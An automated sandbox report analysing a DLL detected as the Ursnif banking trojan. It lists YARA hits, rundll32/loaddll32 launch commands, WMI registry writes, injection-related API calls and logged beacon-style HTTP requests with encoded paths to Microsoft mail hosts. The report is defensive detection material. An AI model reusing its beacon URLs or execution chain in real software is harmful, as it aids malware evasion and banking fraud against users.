                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/a7_2B8h2NmEQ_2FO6HINr/eS5x2dWmrnxEuUas/E6VYZyoESNredc4/JUFmKkMiSye_2BBKeH/JexZCfmhU/vSKjW_2B8KOY/RYzBQt1.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/QoeEw7znNY9KuZLPv/PhlDvAFg0Bnn/nVx6DnTynJS/Jqe2AOjRD8vYJs/PuqBLIn3Zd37OXyJlwD7Q/FiLhjKnVW_2ByswX/LXphFosRYtREZOL/Q6wDOp8ES889SSlI1S/AFbHRrWLn/_2F7R_2FVhgDELEonTCy/KSLPzpnW0YF_2FoB4Xy/kHR_2F88KI6KqxU9hJvbKE/it_2FLM35/c.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.116.82:443 -> 192.168.2.4:49806 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.183.162:443 -> 192.168.2.4:49807 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.218.82:443 -> 192.168.2.4:49808 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.153.146:443 -> 192.168.2.4:49809 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.218.66:443 -> 192.168.2.4:49810 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.137.210:443 -> 192.168.2.4:49811 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49827 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49829 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.153.146:443 -> 192.168.2.4:49860 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.207.194:443 -> 192.168.2.4:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.124.226:443 -> 192.168.2.4:49862 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916379765.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1049081119.000000000383F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916579363.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1187092392.00000000054C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930624015.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.960454814.0000000003A3B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1020193164.000000000563D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.917263832.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930910657.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931064048.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185910848.00000000037C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930863354.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916716758.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916652805.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1006058312.000000000393D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1063376109.000000000553F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931519942.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931136929.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916501324.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930715901.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930775995.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7036, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4cd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1370000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.843034391.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.888775678.0000000004D09000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.817641494.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.859623257.0000000001390000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.815784536.0000000003220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1186977706.0000000005229000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185750269.0000000003559000.00000004.00000040.sdmp, type: MEMORY
                      Source: loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916379765.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1049081119.000000000383F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916579363.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1187092392.00000000054C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930624015.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.960454814.0000000003A3B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1020193164.000000000563D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.917263832.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930910657.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931064048.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185910848.00000000037C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930863354.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916716758.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916652805.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1006058312.000000000393D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1063376109.000000000553F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931519942.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931136929.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916501324.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930715901.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930775995.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7036, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4cd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1370000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.843034391.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.888775678.0000000004D09000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.817641494.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.859623257.0000000001390000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.815784536.0000000003220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1186977706.0000000005229000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185750269.0000000003559000.00000004.00000040.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 616412739e268.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7072 -s 636
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D21B40_2_6E2D21B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2E56000_2_6E2E5600
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E31D6300_2_6E31D630
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E333CCE0_2_6E333CCE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E31B5970_2_6E31B597
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E32A2B10_2_6E32A2B1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E30E8C00_2_6E30E8C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CD4C403_2_04CD4C40
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CD2B763_2_04CD2B76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CDAF243_2_04CDAF24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2E56003_2_6E2E5600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E31D6303_2_6E31D630
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E333CCE3_2_6E333CCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E31B5973_2_6E31B597
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E33FA783_2_6E33FA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E32A2B13_2_6E32A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E33FB983_2_6E33FB98
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E30E8C03_2_6E30E8C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04974C405_2_04974C40
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0497AF245_2_0497AF24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04972B765_2_04972B76
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E30ABD1 appears 91 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E30ABD1 appears 91 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D13B8 GetProcAddress,NtCreateSection,memset,0_2_6E2D13B8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D1273 NtMapViewOfSection,0_2_6E2D1273
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_6E2D15C6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D23D5 NtQueryVirtualMemory,0_2_6E2D23D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CD5D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_04CD5D10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CDB149 NtQueryVirtualMemory,3_2_04CDB149
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04975D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_04975D10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0497B149 NtQueryVirtualMemory,5_2_0497B149
                      Source: 616412739e268.dllReversingLabs: Detection: 24%
                      Source: 616412739e268.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7072 -s 636
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 644
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 632
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrassJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,FieldeightJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,OftenJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1EDD.tmpJump to behavior
                      Source: classification engineClassification label: mal96.troj.evad.winDLL@14/12@24/10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CD4A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_04CD4A03
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6464
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7072
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1364
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: 616412739e268.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
